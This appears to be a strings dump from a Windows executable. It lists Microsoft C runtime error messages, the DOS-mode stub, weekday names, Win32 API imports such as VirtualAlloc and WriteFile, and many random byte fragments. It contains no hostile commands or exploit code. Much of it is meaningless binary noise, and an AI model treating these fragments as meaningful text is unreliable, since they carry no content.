This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
@*,T!i
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
t<,QQL
TranslateAcceleratorA
TranslateMessage
t"SS9]
t,.[TE
t$<"u	3
Tuesday
;t$,v-
t+WWVPV
UaeEW)
;Uj>\X_
	)u+Ky?[)
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UpdateWindow
UQPXY]Y[
URPQQh
USER32.dll
USER32.DLL
u%UC=0
u$WYCz
V5IM@M@}
vc.orod
&?vDy$ 
?`^&ve
|Ve$`b
VirtualAlloc
VirtualFree
v	N+D$
vrartM
VUFimr
 v(vtv
w)171C
^W,BYz
{W]Dj]
Wednesday
WideCharToMultiByte
	WR5!dB
WriteFile
wsprintfA
wtDDDDDDDC
Wt	j~^
W< tnmf
wwwws0
wwwwwwws
wwwwwwww?
wwwwwwwws
wwwwwwwwww
wwwwwwwwwwwww
wwwwwwwwwwwwww
wwwwwwwwwwwwwwz
wwwwwwwwwwwwwz
wwwwwwwwwwwwwzwwww
wwwwwwwwzww
wwwwwwwxx
wwwwwwwz
wwwwwwwzww
x0<3;t
xeagsB
xiE9k;'
xSXw<*
|~XWMi
X	'(xaMA
y#/3?s
yI0met
Yilcej
Y]L5PP
yof6]U
>=Yt1j
yTdae+de
y?"u2j
Y]UWK.
Z-0yKJ
zeeerF
^z&pKV
zyisS1